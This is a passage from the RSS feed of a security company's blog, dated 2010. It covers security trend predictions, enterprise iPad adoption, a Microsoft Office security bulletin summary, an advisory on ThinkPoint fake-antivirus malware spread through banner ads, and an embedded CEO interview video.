<li><strong>Migration of malware to the web</strong>. Hand-in-hand with the explosion in malware samples is the change in attack tactics. Instead of mailing infected attachments to their intended victims, the bad guys are much more likely to send e-mails with hyperlinks in them, which they then induce the recipient to click on. When clicked on, the link leads to a site that dynamically generates “drive-by” malware that is custom-made for the victim. Again, this goes back to the “designer malware” comment in the previous bullet. Some of the vendors I&#8217;ve worked with in the past (like WebSense) have noted the movement of malware away from e-mail and towards the web. As an MSSP with content filtering services, we&#8217;ve noticed it too. What it means for our customers is that web content-filtering becomes a lot more important than it used to be. Keeping inbound web traffic free from malware becomes as critical for security (indeed, <em>more</em> so) as the outbound stuff. Never mind whether Johnny in Accounting is spending too much time on ESPN&#8217;s website — you should care just as much if he&#8217;s getting 0wned when he goes there.</li>
<li><strong>Mobile security fears</strong>. From the iPad to those newfangled Android devices, every enterprise I&#8217;ve spoken with is worried about what modern Post-PC devices will do to their security posture. The urgency stems from two sources. First, managers want to know how to apply security controls to consumer-grade gear being brought into the workplace by employees and executives. They want to know what kind of password and data protection policies they need, and how to apply them to gear that isn&#8217;t named BlackBerry. Second, companies have concerns about the iPad in particular, because of business initiatives outside IT. Both scenarios are equally important. You can read about my perspective on Apple devices in <a href="http://www.forrester.com/rb/Research/apples_iphone_and_ipad_secure_enough_for/q/id/57240/t/2" target="_blank">this Forrester report</a>, which I wrote last summer, and in press accounts of it <a href="http://www.infosecurity-us.com/view/11447/forrester-says-iphone-ipad-now-secure-enough-for-enterprise-deployments/" target="_blank">here</a> and <a href="http://www.garagesalepreview.com/how-to-secure-ipads-for-corporate-use/" target="_blank">here</a>.</li>
<li><strong>More compliance pressures</strong>. Compliance and security are often conflated, but it&#8217;s best to view the kinds of security activities enterprises do for compliance purposes as a kind of tax they have to pay to stay in business. And every year, the “tax rate” goes up. For example, with the passage of the HITECH provisions of the American Recovery and Reinvestment Act (ARRA) of 2009 (aka “the stimulus bill”), health care Covered Entities (hospitals and providers of medical care) and their Business Associates (insurers and other partners) are subject to more stringent rules on what they must do to safeguard protected health information (PHI). For retailers, recent revisions to the Payment Card Industry&#8217;s Data Security Standard (PCI-DSS) mean that businesses that accept and process credit cards must tighten up their wireless networks, manage their server log files better and audit their web-facing applications. And in the banking sector, new rules from FINRA around social media mean that employers must monitor their employees&#8217; use of Facebook and other outside websites.</li>
</ul>
<p>All four of these trends are top-of-mind concerns for just about every security professional and CISO I speak with. What is most interesting for me, as an observer, student of security and CTO is the mix of concerns. Threats and compliance pressures are perennial concerns: they are always with us, and always need tending to. The attackers won&#8217;t stop brewing up increasingly lethal doses of malware for consumption by the unwitting, and the auditors won&#8217;t put down their clipboards. But the new evergreen issues on this list — mobile security, and the increased lethality of web content — could cause rapid shifts in company security postures very quickly if they aren&#8217;t dealt with. How we respond to these two issues is the key.</p>
<p>And on that note, we&#8217;re at a good breaking point for this post. The next posts will summarize what we learned from 2010&#8217;s three most interesting events, and offer predictions for 2011.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/5-data-security-predictions-for-2011-part-1-of-3-the-year-of-living-dangerously/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>iPads Hit The Enterprise</title>
		<link>http://perimeterusa.com/blog/ipads-hit-the-enterprise/</link>
		<comments>http://perimeterusa.com/blog/ipads-hit-the-enterprise/#comments</comments>
		<pubDate>Wed, 08 Dec 2010 18:07:18 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Apple iPad]]></category>
		<category><![CDATA[Enterprise IT]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1068</guid>
		<description><![CDATA[Many basic security concerns–the loss of data if a device is lost or stolen, for example–can be addressed with encryption, a remote wipe capability, and a policy mandating that data get wiped after four or five incorrect password attempts.]]></description>
			<content:encoded><![CDATA[<p>Reposted: <em>From Shack to Mansion</em></p>
<p>The market for tablet computers, which sputtered with an earlier generation of devices, is growing rapidly this time, thanks to Apple’s iPad. And it’s not just a consumer phenomenon, as doctors, lawyers, and other businesspeople adopt the iPad for a range of mobile applications.</p>
<p>James Gordon, VP of IT at Needham Bank, initially wondered if the iPad wasn’t merely a glorified iPhone. “The answer is yes–but it’s a really good glorified iPhone,” he says. In addition to providing iPads to senior executives at the bank, Gordon gave one to the committee responsible for checking on construction projects before releasing loans to builders, enabling that group to do more of its work from the field.</p>
<p>Gordon didn’t hesitate in approving the iPad for enterprise use, because the bank had already established device management and information security policies for the iPhone, which uses the same iOS operating system.</p>
<p>That’s a common uptake pattern, according to Dave Dahlberg, chief marketing officer at Model Metrics, which helps companies extend Salesforce.com applications for mobile use. Companies that already went through an enterprise evaluation of the iPhone are giving the iPad their stamp of approval in weeks, rather than the months it took for the iPhone.</p>
<p>Hyatt Hotels, Medtronic, and Wells Fargo are among the companies that have purchased iPads for some employees. SAP indicated it could buy as many as 17,000 of the devices.</p>
<p>Apple ignited this tablet excitement, but it won’t have the market to itself for long. Samsung and other manufacturers are selling the slim, portable devices based on Google’s Android operating system, Research In Motion is developing the BlackBerry Playbook, and Microsoft will be getting into the market, too. This generation of tablets tends to be smaller and lighter than before, with touch-screen rather than pen-based user interfaces, and daylong battery life.</p>
<p>So far, the iPad is the runaway favorite and the one building a track record within the enterprise. From a security perspective, the iPad even has some advantages, says Andrew Jaquith, CTO of Perimeter E-Security, a provider of managed security services. For example, whether through the Apple App Store or a corporate applications portal, the distribution of software is tightly controlled, so malicious software “is unlikely to be a problem the way it has been on the PC,” he says.</p>
<p>Many basic security concerns–the loss of data if a device is lost or stolen, for example–can be addressed with encryption, a remote wipe capability, and a policy mandating that data get wiped after four or five incorrect password attempts. If important information on the device is synchronized with an enterprise data store, such mishaps do little harm, he says.</p>
<p>In some cases, enterprise data is viewed on the device but not stored there, using a remote access utility and encrypted connection. Needham Bank, for example, uses Array Networks’ DesktopDirect for that purpose, while other companies we talked to employ Citrix Receiver. Beyond that, Jaquith sees a market opportunity for companies like Perimeter to provide managed security services for tablets.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/ipads-hit-the-enterprise/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Security Bulletin &#8211; Critical Microsoft Security Bulletin Summary for November 2010</title>
		<link>http://perimeterusa.com/blog/security-bulletin-critical-microsoft-security-bulletin-summary-for-november-2010/</link>
		<comments>http://perimeterusa.com/blog/security-bulletin-critical-microsoft-security-bulletin-summary-for-november-2010/#comments</comments>
		<pubDate>Mon, 15 Nov 2010 21:29:35 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[Application Vulnerability]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[IT Security]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1055</guid>
		<description><![CDATA[Microsoft released updates to address critical vulnerabilities that affect all supported editions of Microsoft Office 2007 and Microsoft Office 2010.]]></description>
			<content:encoded><![CDATA[<p>As part of the Microsoft Security Bulletin Summary for November 2010, Microsoft released updates to address critical vulnerabilities that affect all supported editions of Microsoft Office 2007 and Microsoft Office 2010. This security update is also rated Important for all supported editions of Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, Microsoft Office for Mac 2011, and Open XML File Format Converter for Mac. The most severe vulnerability could allow remote code execution if a user opens or previews a specially crafted RTF e-mail message.</p>
<p>The following table summarizes the November security bulletins that affect Microsoft Windows in order of severity.</p>
<p><strong>Affected Software </strong></p>
<table border="0" cellpadding="0" cellspacing="0" style="color: #6e6f65">
<tbody>
<tr>
<td><strong> Microsoft Office Suite and Other Software </strong></td>
<td><strong> Maximum Security Impact </strong></td>
<td><strong>Aggregate Severity Rating </strong></td>
<td><strong> Bulletins Replaced by this Update</strong></td>
</tr>
<tr>
<td><strong>Microsoft Office Suites</strong></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td><p><a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=F32648E3-2FB5-472C-932F-360E5D3C0931" target="_blank">Microsoft Office XP Service Pack 3</a></p>
<p>(KB2289169)</p></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td><a href="http://www.microsoft.com/technet/security/bulletin/MS10-003.mspx" target="_blank">MS10-003</a></td>
</tr>
<tr>
<td><p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=07a6cf76-2cea-4c54-b66d-50e9eed108ac" target="_blank">Microsoft Office 2003 Service Pack 3</a></p>
<p>(KB2289187)</p></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td><a href="http://www.microsoft.com/technet/security/bulletin/ms10-036.mspx" target="_blank">MS10-036</a></td>
</tr>
<tr>
<td><p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=be0c5878-60c0-4700-8836-50d369b51d04">Microsoft Office 2007 Service Pack 2</a></p>
<p>(KB2289158)</p></td>
<td>Remote Code Execution</td>
<td>Critical</td>
<td><a href="http://www.microsoft.com/technet/security/bulletin/ms10-036.mspx" target="_blank">MS10-036</a></td>
</tr>
<tr>
<td><p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=0b308508-0e1e-4e90-b2b8-7e32bfc5dbf4">Microsoft Office 2010 (32-bit editions)</a></p>
<p>(KB2289161)</p></td>
<td>Remote Code Execution</td>
<td>Critical</td>
<td>None</td>
</tr>
<tr>
<td><p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=534c6a2a-e7c6-4adf-8b81-e009a2b5fff4">Microsoft Office 2010 (64-bit editions)</a></p>
<p>(KB2289161)</p></td>
<td>Remote Code Execution</td>
<td>Critical</td>
<td>None</td>
</tr>
<tr>
<td><strong>Microsoft Office for Mac</strong></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Microsoft Office 2004 for Mac<sup>[1]</sup></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td>None</td>
</tr>
<tr>
<td>Microsoft Office 2008 for Mac<sup>[1]</sup></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td>None</td>
</tr>
<tr>
<td><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=8bd6ca3b-8004-4e8d-a09d-220dcbbce799">Microsoft Office for Mac 2011</a></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td>None</td>
</tr>
<tr>
<td>Open XML File Format Converter for Mac<sup>[1]</sup></td>
<td>Remote Code Execution</td>
<td>Important</td>
<td>None</td>
</tr>
</tbody>
</table>
<p><sup>[1]</sup> The security updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time.</p>
<p>To avoid being affected by these vulnerabilities, our security experts recommend installing the necessary update, which can be found on the Microsoft website, on your machines.</p>
<p>Here is the link for more information.<br />
<a href="http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx" target="_blank">http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/security-bulletin-critical-microsoft-security-bulletin-summary-for-november-2010/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Bulletin &#8211; ThinkPoint Malware spread via Banner Advertisements</title>
		<link>http://perimeterusa.com/blog/security-bulletin-thinkpoint-malware-spread-via-banner-advertisements/</link>
		<comments>http://perimeterusa.com/blog/security-bulletin-thinkpoint-malware-spread-via-banner-advertisements/#comments</comments>
		<pubDate>Thu, 28 Oct 2010 15:10:58 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Web Content Filtering]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1038</guid>
		<description><![CDATA[Perimeter’s Security Operations is observing an aggressive FakeAV/RogueWare installation campaign utilizing banner ads on trusted websites.]]></description>
			<content:encoded><![CDATA[<p>Perimeter’s Security Operations is observing an aggressive FakeAV/RogueWare installation campaign utilizing banner ads on trusted websites. Some of the sites currently serving this malicious software include <strong>msnbc.com</strong>, <strong>youtube.com</strong>, and <strong>bing.com</strong>.</p>
<p>The Perimeter Security Operations Center has recently discovered that upon visiting these sites you may be presented with either a fake Adobe Reader 8 install prompt or a Microsoft Security Essentials &#8220;Infection Found&#8221; pop-up window. Neither of these is legitimate.</p>
<p>This ad-based drive-by download presents itself as ThinkPoint. The file may use a legitimate-looking name such as hotfix.exe or mstsc.exe and is saved to a temp directory. It then picks out random files, claims they are infected and forces you to &#8220;clean&#8221; these false threats. ThinkPoint will state that you need a heuristic program to fix the problems and offers to sell one for $99.90. <strong>Do not purchase ThinkPoint; this program is fraudulent!</strong></p>
<p>Anti-virus products may detect this as FakeAV, FakeAlert, or a generic Trojan. A full list of detections can be found here:</p>
<p><a href="http://www.virustotal.com/file-scan/report.html?id=c049d274905ac80c9377e1cb0c291a5e67c33876ce256454db29dea953e44e4a-1287696527">http://www.virustotal.com/file-scan/report.html?id=c049d274905ac80c9377e1cb0c291a5e67c33876ce256454db29dea953e44e4a-1287696527</a></p>
<p style="text-align: center;"><a href="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image001.png"><img class="size-full wp-image-1040  aligncenter" title="Microsoft Security Essentials Alert" src="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image001.png" alt="Fake Microsoft Security Essentials alert" width="304" height="91" /></a></p>
<p style="text-align: center;"><a href="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image002.png"><img class="size-full wp-image-1041  aligncenter" title="ThinkPoint" src="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image002.png" alt="ThinkPoint rogue anti-virus window" width="303" height="193" /></a></p>
<p style="text-align: center;"><a href="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image003.png"><img class="size-full wp-image-1042  aligncenter" title="ThinkPoint 2" src="http://perimeterusa.com/blog/wp-content/uploads/2010/10/image003.png" alt="ThinkPoint rogue anti-virus window, second screen" width="304" height="178" /></a></p>
<p>There is a surprisingly little information about this trojan variant, considering how popular the sites that are helping spread it are. We have found one reputable anti-virus vendor with insight:</p>
<p><a href="http://www.f-secure.com/weblog/archives/00002053.html">http://www.f-secure.com/weblog/archives/00002053.html</a></p>
<p>For Perimeter&#8217;s ITC customers we have added a null route to blacklist the IP address of the domain actually serving the malware. The advertising domain has also been submitted to Fortinet to be recategorized as Malware until this issue can be resolved by the primary domains using the advertisements.</p>
<p>For customers using Fortigate, additional steps to prevent this kind of infection include subscribing to Web Content Filtering while blocking the Advertising and Unrated categories, and subscribing to network anti-virus with download of Executables blocked.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/security-bulletin-thinkpoint-malware-spread-via-banner-advertisements/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Technology Challenged – Interview with Tim Harvey, CEO of Perimeter E-Security by Dow Jones Investment Banker</title>
		<link>http://perimeterusa.com/blog/technology-challenged-%e2%80%93-interview-with-tim-harvey-ceo-of-perimeter-e-security-by-dow-jones-investment-banker/</link>
		<comments>http://perimeterusa.com/blog/technology-challenged-%e2%80%93-interview-with-tim-harvey-ceo-of-perimeter-e-security-by-dow-jones-investment-banker/#comments</comments>
		<pubDate>Fri, 15 Oct 2010 16:26:14 +0000</pubDate>
		<dc:creator>Perimeter</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[managed services providers]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1033</guid>
		<description><![CDATA[Despite aggressive investment by large technology vendors and a wide array of start-ups chasing the space, there are under served customers in the information security market.]]></description>
			<content:encoded><![CDATA[<p>Despite aggressive investment by large technology vendors and a wide array of start-ups chasing the space, there are under served customers in the information security market.</p>
<p><object id="wsj_fp" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="512" height="363" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="flashvars" value="videoGUID=EF3E25AF-B083-4CA6-9CFC-63867ADE8B7F&amp;playerid=2001&amp;plyMediaEnabled=1&amp;configURL=http://wsj.vo.llnwd.net/o28/players/&amp;autoStart=false" /><param name="src" value="http://s.marketwatch.com/media/swf/main.swf" /><param name="name" value="flashPlayer" /><param name="bgcolor" value="#FFFFFF" /><param name="allowfullscreen" value="true" /><embed id="wsj_fp" type="application/x-shockwave-flash" width="512" height="363" src="http://s.marketwatch.com/media/swf/main.swf" bgcolor="#FFFFFF" name="flashPlayer" flashvars="videoGUID=EF3E25AF-B083-4CA6-9CFC-63867ADE8B7F&amp;playerid=2001&amp;plyMediaEnabled=1&amp;configURL=http://wsj.vo.llnwd.net/o28/players/&amp;autoStart=false" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/technology-challenged-%e2%80%93-interview-with-tim-harvey-ceo-of-perimeter-e-security-by-dow-jones-investment-banker/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
